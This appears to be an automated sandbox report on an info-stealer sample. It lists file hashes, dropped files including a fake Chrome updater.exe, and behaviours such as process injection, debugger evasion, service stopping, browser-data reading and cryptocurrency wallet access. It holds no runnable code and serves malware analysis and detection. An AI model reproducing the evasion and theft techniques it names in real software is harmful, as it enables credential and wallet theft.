MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2940-311-0x000000013F660000-0x0000000140886000-memory.dmp

memory/2188-313-0x00000000777B0000-0x0000000077959000-memory.dmp

memory/2188-315-0x000000013F660000-0x0000000140886000-memory.dmp

memory/2940-318-0x000000013F660000-0x0000000140886000-memory.dmp

memory/2188-319-0x00000000777B0000-0x0000000077959000-memory.dmp

memory/2188-320-0x000000013F660000-0x0000000140886000-memory.dmp

memory/1368-322-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

memory/1368-323-0x00000000011D0000-0x0000000001250000-memory.dmp

memory/1368-324-0x00000000011D0000-0x0000000001250000-memory.dmp

memory/1368-325-0x00000000011D0000-0x0000000001250000-memory.dmp

memory/1368-326-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

memory/1368-327-0x00000000011D0000-0x0000000001250000-memory.dmp

memory/1368-328-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

memory/2216-331-0x000007FEF52B0000-0x000007FEF5C4D000-memory.dmp

memory/2216-333-0x0000000000D90000-0x0000000000E10000-memory.dmp

memory/2216-334-0x000007FEF52B0000-0x000007FEF5C4D000-memory.dmp

memory/2216-335-0x0000000000D90000-0x0000000000E10000-memory.dmp

memory/2216-336-0x0000000000D90000-0x0000000000E10000-memory.dmp

\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/2216-344-0x000007FEF52B0000-0x000007FEF5C4D000-memory.dmp

memory/3020-343-0x000000000DC10000-0x000000000E244000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2084-348-0x0000000001280000-0x00000000018B4000-memory.dmp

memory/2084-350-0x00000000779A0000-0x00000000779A2000-memory.dmp

memory/3020-351-0x00000000745C0000-0x0000000074CAE000-memory.dmp

memory/3020-352-0x0000000002430000-0x0000000002530000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Local State

MD5 e1352a1843a2207a76a6b367462324a1
SHA1 d67a75167db929373d0832dff6dd5e5d9afeebd5
SHA256 aa4327615127d2875f9b35542ce3ec2dc17a574d3308c3f6db36fefae3923095
SHA512 5daf17ee5be47424a242d91ab818d76089eb90f9802277567dc1c6aae9ccfa4ccb8d29a94980a24ab7b55b7dfbddf2e93557e5846d3d97a197c5a50d98cea40d

\??\pipe\crashpad_1600_CSYFLYOJSLOXZLWK

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Local Storage\leveldb\MANIFEST-000004

MD5 031d6d1e28fe41a9bdcbd8a21da92df1
SHA1 38cee81cb035a60a23d6e045e5d72116f2a58683
SHA256 b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da
SHA512 e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Local Storage\leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Local Storage\leveldb\LOG

MD5 61acd27e7dd0a4cfbff28852af82fed9
SHA1 46872b46d13370d12472874f1e1a1f63e1bcd2bc
SHA256 6130d0f7969b9fcc6c39c223901fdafad3a6b52c7f1ea2a963238ba1998a5976
SHA512 44112ca747835bd1c2202787f80839f0290ab2c19456ada58963ad73ad016cc0ff4db4edcd3b94da64af3ae2846b3d6068ac840502b63346d31eaf12f651bf37

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Local Storage\leveldb\LOG.old

MD5 9a5fa3edd2c2af71986199fe74033097
SHA1 b4516b6b87ef5387d4bbb585c883cec7fa48c44c
SHA256 c352e18654165e2cdbf584baebf798bbcdd0ae021121a23d89c9a49137782b96
SHA512 c3f06507d460b07215b8881ac0c1f9ac1753ec831446ac236257ab2e0027ed5523549ed9c7b9e51ca945404fde31b5dc36ab114509873cf69760378172879811

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Session Storage\CURRENT~RFf784431.TMP

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000002.dbtmp

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\index-dir\the-real-index

MD5 60b02ee1e879f52bfde800a394222811
SHA1 74639ac5dec19e2395de2bcf135b112ed085c9ee
SHA256 350faf089ff12ecf4afef63888b61fa892a3c4faf26005b8e6f3ca24f3fec31d
SHA512 4b2b89b517df0c318e526e5b2041b4e11818d0a7814ba1c534767e36fe0ee2e856f4fb110ba95fc62698d7015b951545cb537b71d2d935e6fa7bdd2907c2cc08

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\data_2

MD5 4489eabf6d1dffb9fe31a5ade421dc8a
SHA1 bc03f37467d4e1b94e00a078a18f95a49420fe89
SHA256 a4448506f94cacf339541f2b6ae2c7c53783cd13a526473ab43586e895ed6ee7
SHA512 181f3336fbf364add21bf07216c2073f89f16c9bd824a8a51dafa2ca9f3e3f7b8c537cb87a41ba4c22cd009fdf0bd34803f8527597a1e68b05ab6d331acc5117

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\data_1

MD5 d667a2c6d8f2711dc792d8cfdfa9f6c8
SHA1 370b176d2434300e7e14579fdab7a73909f2ca53
SHA256 eb7154eab6ff30f015af85b47e5eab6f3a402228fee11883a88df564b01d9040
SHA512 c9cd43df61c5146b28352830106629e9bd15ade691bafbb88621b61518be61daa99ff8ad5c4c8cfaf07c45a8fd5bb9ab3236acd1f559b73c0b7ce7e4bf138c1f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Crashpad\settings.dat

MD5 97fa42331319da652d96e2ec7bf0fc8b
SHA1 6c463ffd8117a61dbd63be0b807ba72deb54f3be
SHA256 8dcf05ad2d66efc6c61240a8baea0ab1bb3669cb3fc322078f651fcf7ce6f61f
SHA512 3680a3294f1ea1c8366d7edf863d911dd2d019f3d93e3ef4831e84ac3e73f9d2accde14eecaeee38125117083ca58be69dcad1ed17e9a086cbc37ad5db924dfb

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\DevToolsActivePort

MD5 56953ee53cff903696a42aed4b1bd507
SHA1 e5adb5470ddf76a17d2a0034253dbcfb97a49932
SHA256 80883f6bfdcfb328373b55c7cc38ebde5fc100aa0fb5853cf187fc5959655c84
SHA512 1e88081fbf2eccf9de8d2fad549d6a1c192a37b3de841715da0b2097c2d7953afdc95ed04f856f4ebb3c9beca889d84d8e2f6410878e47a6e28f74bd9463fe24

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\data_0

MD5 3175d61dfb97ca4c924be3c002110ebf
SHA1 11e4c99b982af88f65aae5e9cb856df2360edd7a
SHA256 74110f7345b8392a5df42f1da45e6f10d1d80fe6d18371872f18dce4cfb7e75b
SHA512 9fb1203f5b242083a2491dd2c7b27430c459cd8f80860d2c625f5aa0ec8130ab017c6913fac8726aa4ee12abf5aa507b9826f8ff5f14038f97a73a11bcc22607

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\64961e4faf967aa0_0

MD5 78ebc92eec65789070235669133fabbf
SHA1 8dbca4a8f025c46e74586e3cd40b9212e2f8282f
SHA256 d41a5bda824d41c807f32f351d1acc6d9f265463217b0effab778a8f7bf1914e
SHA512 9f7b1e2687073fbec32058fcc3d29732a2e597f89f39b086c9bff2431e2b004acfb759f5a9493b22b3f9b856b4391fb6d7fcfb82e4131141e84e8f657a65fd90

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\61d62438b0793205_0

MD5 cd50e7ca5e640f4b5652ba19cb7a9424
SHA1 d6e5e557647b941bcb7399def90fe2d1eeae5847
SHA256 1824cf1a864aa945346a339a892e1e787ed8f007999123d4ecb8991a0500aee3
SHA512 365b83686663258c5a1af63a46d6c6fdedb4b82f96b6b78aff0aeeef5769650782233d821441ce75d5991c17dab4238265c32dea6af022e8091156322436ddb3

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\6197134d877c05b7_0

MD5 4e56befe7592cec579ec2fa55ab09f8d
SHA1 cacd5661d466d4305580e23bfd21ada33a72523b
SHA256 600d6b267f1c6c6218cdb733aa50fdfa6b4c80529d8bddb77a16fdc61b85fb15
SHA512 9b775559f75d0c6557669dc453d2d6b6d6ac0e17af4986ac4378359bf30cac4afd5eb7e582e996f92c8d67be2ddef345e8f09aa4e3c72b19c2dbaf72b555d41f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\60ae0d0fe9088cac_0

MD5 0405a52fd02445f5cf9f508fc12950cc
SHA1 1547bd289722b1f5e63c3b8d6cf441660d29470b
SHA256 fc4b3ba528e749c2b57186597dad1d5bc92fc7296fc1e560b4ae5f649eb1774d
SHA512 ec1e1c341d1b359a63be1e5b435413089dbf244056b871937dfe1893a04a82a21197a2d942d1325dabbcecc7f0cd33f4f94891c46ce5fc03bce4eb3683af838c

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\5b76df05a935e848_0

MD5 398910d7aec1c70c86cdb5b5b1e3d28e
SHA1 f80cb853b9e992ff5e6a911e165a8a3c17fcb040
SHA256 ef0f0fc108b549f4bb23e6e7279a056bf8a5d915e6e69d793513dc39796d936a
SHA512 d4f055e96cd2ad0cd27f6c94d117a738c4a5f49e7ca3f2894a8bc666f94f8cf2017a360ce35ede7072e45466ead7461fb57ff601b93e946cbb5d37bf41fbeef8

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\5003563973751d44_0

MD5 5feae9c14f935e81e41cc3a1ebddc8d0
SHA1 783ec60b097e649437cc2601d3437f9bcbb02dd5
SHA256 54bdf3d18bb20706a9ac95d31b066491bdf5bfd52de8e40d3e4e98ba47d91942
SHA512 d18ffcfc297195640c068497d348600dea579b8c59c967c6f77342670f8849715a5182725a7ef8871afee6616a3656e3b50978ed6f3acd09b3d72c22641fa025

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\343f6993e27f1d39_0

MD5 bda629b5b8891544c865a07fb98c52e7
SHA1 d5db6df8944a87b439fcb105e241facc50e70f47
SHA256 926b4185c760fed83e3d68b9adee9564dd0722e73abe1881d0bbab75e4c7945b
SHA512 7041ab9123e623bb17fb0415d0151c07c8d76c606a6c2d8b318a496f0a80a1a2831bd3d0ef4be5e690605bd6213b04a752f6b10b33d883b9a908237c8afacaa5

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\2e64514b9cd267ab_0

MD5 58113d55fbf2abb33f03d9afd8347724
SHA1 8d330e3b2fae4ea3c401c5891a6d45165b4ebcda
SHA256 ba37b8e91c5c8f07e83fd8473c6179aa9d831db5028f37b7822fef193d73a3b6
SHA512 e5820d3cfe6ee2ebc7bd15410ac3e6cb001c5010bb40c27199a9a48fdecb418da226c2e27ba4070dbacf144255820621c59d2e817fa706ccc7a488522a8cfb68

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\2ca80a621de666cd_0

MD5 63e23af767b44367f9b4f612c30f69fc
SHA1 481a3820b40f1c505d4d9b025b43ca9c856014d9
SHA256 17d3178733fa04f64d71fb9c576a7a8b5d5c36b5b4088281196c58ff63e90d17
SHA512 7f5440945f6c9a735d97c68875c205369c0a4ccae9ec6d29fe1a22a4342938c6c7d6156b242f463458a621706bf1b1c9deba4125f63f519049d22161cbec798c

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\23c05bba7a1589a0_0

MD5 27e9435dc695a5a8bdd7358c97cd86e1
SHA1 76ea3947d0efb54e2249bebf68ea4de5d7a26910
SHA256 3d05efb96fdc669b147b645f1ed6e80cf320527c32554f5472a46c9e23815ecf
SHA512 b49bfa9b6a1b7e20fef0ad460ac68685f1c3fe469bd11716eab93cc3f3c3aca603d5aa810b73b5fca1c113a17b3da7465238790af2cacbcd3e654b3dc91cc2cb

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Code Cache\js\06db5837b6c74111_0

MD5 3986187d343607ef87c950ac4e5724ac
SHA1 0a6257fe5a625f0f3937570b05dfa85f25385b30
SHA256 665a63219f92ed9f432692c6b319ca5064faecc44ed23706d2af07e6add85d5c
SHA512 4a086a06499e5da74de261cd6d398668464b8fdde027642c7d7d90bb03ca47342fe6c9e3066d7fd2be75c7c806adb988b0b9cea4a7fa85ea04d90b770bb91bc4

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\index

MD5 4064a81a68402f21d9acd6d0a5c7611c
SHA1 41045a3d54dcda794b8db2f12fc962a67e1c1c79
SHA256 8eac7da02081d1127ed9b7d471ade58dd642e5a53d7ecdb8ea4cbf0e20dbbea3
SHA512 19cf0257d6e62fd76610ca9f50cba94a89dd839e4032edf8d3b1261a8c62ddb0414d407ed2dbab23b67a6ce68d8394eeb774630f0e908c38d8befcb55c4b06b4

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_00000c

MD5 ccd8fdb35b360d667aabd139cf2f763d
SHA1 249cb9ff5099f07f488b4d5429634fe8a8ca6ea8
SHA256 8ed710089acb08631c28bdfcef5628a616b3a65e88372fd63977d0fbda249f1f
SHA512 b2feafbcc91a712fcce214212e57ce8a22b0badad52ae3e05947715828769188a46a5fcfd76eb8641087529e560b4b0b953e456bf58e4e46f0c5f67a6debbebe

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_00000b

MD5 9f1c899a371951195b4dedabf8fc4588
SHA1 7abeeee04287a2633f5d2fa32d09c4c12e76051b
SHA256 ba60b39bc10f6abd7f7a3a2a9bae5c83a0a6f7787e60115d0e8b4e17578c35f7
SHA512 86e75284beaff4727fae0a46bd8c3a8b4a7c95eceaf45845d5c3c2806139d739c983205b9163e515f6158aa7c3c901554109c92a7acc2c0077b1d22c003dba54

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_00000a

MD5 2d52125a96fb5a7227c67848bc18f65c
SHA1 a3593c6d8e3b6b458b6bbc2c6423dc76e30a84a3
SHA256 61f3154c19e46e1989d6fadbfe20835d0c9fc47242dc5828e776e3ec667fda24
SHA512 5f151708007cb474e64e8968b1f6b5e5331c434cc237627c6c5c92d1894d020f476ad88461e35fbf383aa46750a9cdcaf3a2ac8fe90570753c73fcf17ac0cbe6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_000009

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_000008

MD5 c101a8ba729b894927d7d884e4be68a8
SHA1 4bf48f94ff4e50e81c9d83b641af74b3bed580a0
SHA256 544f08482a62485be4acbc443462b01fe16b408b3d154c0cb1ff921a453cee33
SHA512 77483a92abeed799dfb1e782988569875b29eccebfb14e5be353302849ea6f0ac6a6411a72d6da706ec3767a54f12907fd0bfa4646ad4ca1cf4e1e15fbe9a9ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_000007

MD5 6a3bb9c5ba28ee73af6c1b53e281b0cf
SHA1 d96e403c99c1707f82ea29c2c1f134e792c64097
SHA256 2f5adfc38558162578ffe112229f10417fbc4b3df025d153d4e22a0c95177740
SHA512 6c4844f70969938339cb6716a834a79e1a8379459c87b983c2518b9cbb560cb2f101aff980f682989928523be6cdc99bde3bfd8137f9c54a58191b900b580fbf

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_000006

MD5 d9ac252543e19a234db5a147e3ffc639
SHA1 560c646702aba6cb635128b1e4e3fb78c62fcb67
SHA256 4aace29b44cad685519cd859721c4bfb9790a4a64eb8e32e40ca58491d67713b
SHA512 4608012cbafce38231dd4d51ece0d565001ba3490831dcb2909522d91dec0fe712b43a66c4f9e8063db773453a2f8993bb5d1a9e83cc7f7d2b3ee1f4e96addc9

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_000005

MD5 d4898b52a84026a5022200fbaa820c65
SHA1 791409e8c187418be773aa7f589a2c8e52c41ce0
SHA256 6e6f37d4f8892d41b4b850bc7753f84da6f73d833636125df25ca7bd4c86775f
SHA512 1480c1055eb8efe74645942e087c35d7c0cb5239bc53b350f19e278e5a2522607025cf9dc5c8d30c76e102fc15edb768fa99c9298b77050664fa9520324cff23

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_000004

MD5 3cc207ec29df84cc9c7bb2f8597c5adf
SHA1 b2727aa32e5775cb770e86e0e032468f5756c324
SHA256 17b71418c324214cd860964bbfa7bf41a083bbc4239ef7ea47e48bb370cf20ed
SHA512 af86dcf56fe69da703ad2280da6e998219e34b0da8564b82009fd993f8c80d7675bec3c80ca136722845bfb3f7e526c46154a69099c7bbb9bac141504de461ce

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_000003

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\f_000002

MD5 dc1a475aad930bc6bdee639ba2df283b
SHA1 7fd6b05e23175d282b56b84c90daa6b6b9426fc8
SHA256 4bb0d3921522a05875a11207eb489a2aacce7be42a22b0c833139b210b522f96
SHA512 b1f3e669034a6071f11514f63956292dc5fc20a41bb5d8ba9997836dd69e815ee773d93dc804e130edff5b6a10ed9c7c3a1cf8e37a1740ff03d05b95c5d91f56

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\Cache\Cache_Data\data_3

MD5 eb4975310dcf49f59ffeaf60f80a2dcd
SHA1 b3bf51783b569c5179b798377d56a43f64602dc6
SHA256 534b3b55e158902a17aa1f640678d0a9be5d60d281c8aa0a0ca476dfcecf0ceb
SHA512 d4018160ce23f2b8c71a49f531250bc51bae90a20df39960a24104def0909e0a0eb5c917de0bf2d0b489a7eb4636dd9ef971deb44169cafd6ab175799d50e5d3

C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Default\DawnCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-10 14:46

Reported

2023-08-10 14:48

Platform

win10v2004-20230703-en

Max time kernel

101s

Max time network

140s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1252 created 2520 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1252 created 2520 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1252 created 2520 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1252 created 2520 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 1252 created 2520 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE
PID 4672 created 2520 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
